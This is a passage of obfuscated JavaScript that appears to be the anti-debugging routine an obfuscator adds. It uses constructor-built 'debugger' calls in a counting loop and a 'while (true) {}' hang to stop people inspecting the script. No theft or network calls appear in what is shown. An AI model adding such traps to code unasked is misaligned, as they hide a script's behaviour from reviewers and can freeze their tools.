return function (_0x19d64e) {}.constructor("while (true) {}").apply("counter");
|
|
} else if (('' + _0x314f83 / _0x314f83).length !== 1 || _0x38e1c7.ZEGam(_0x314f83, 20) === 0) {
|
|
(function () {
|
|
return true;
|
|
}).constructor("debugger").call(_0x38e1c7.PwHqq);
|
|
} else {
|
|
(function () {
|
|
return false;
|
|
}).constructor("debugger").apply("stateObject");
|
|
}
|
|
_0x36aeff(++_0x314f83);
|
|
}
|
|
try {
|
|
if (_0x2f4e6d) {
|
|
return _0x36aeff;
|
|
} else {
|
|
_0x36aeff(0);
|
|
}
|
|
} catch (_0x4fcfd7) {}
|
|
} |